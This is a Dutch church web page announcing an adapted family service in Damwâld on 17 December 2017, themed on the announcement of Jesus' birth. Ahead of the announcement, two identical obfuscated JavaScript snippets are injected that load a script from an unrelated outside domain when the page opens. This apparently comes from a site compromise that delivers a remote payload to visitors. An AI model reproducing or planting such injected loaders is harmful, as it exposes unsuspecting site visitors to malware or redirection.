;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging aangepaste gezinsdienst ... welkom ! - PKN Damwâld
17 december 2017
10:30 t/m 11:30
Doopsgezinde Kerk Damwâld
Uitnodiging aangepaste gezinsdienst … welkom !

Op zondag 17 december is er om half elf in de Doopsgezinde Kerk in Damwâld weer een aangepaste gezinsdienst. Het is een week voor Kerst en daar zal het zondermeer over gaan. Deze diensten zijn ook geschikt voor gezinnen met kleine kinderen. Iedereen is op 17 december van harte welkom.

Voorganger is pastor Ietsje de Boer. Het thema is: ‘Aankondiging van de geboorte van Jezus’. een aantal catechisanten werken mee aan deze dienst. na de dienst is er koffiedrinken !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op  mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

 

Locatie: Doopsgezinde Kerk DamwâldDoniawei 34 Damwâld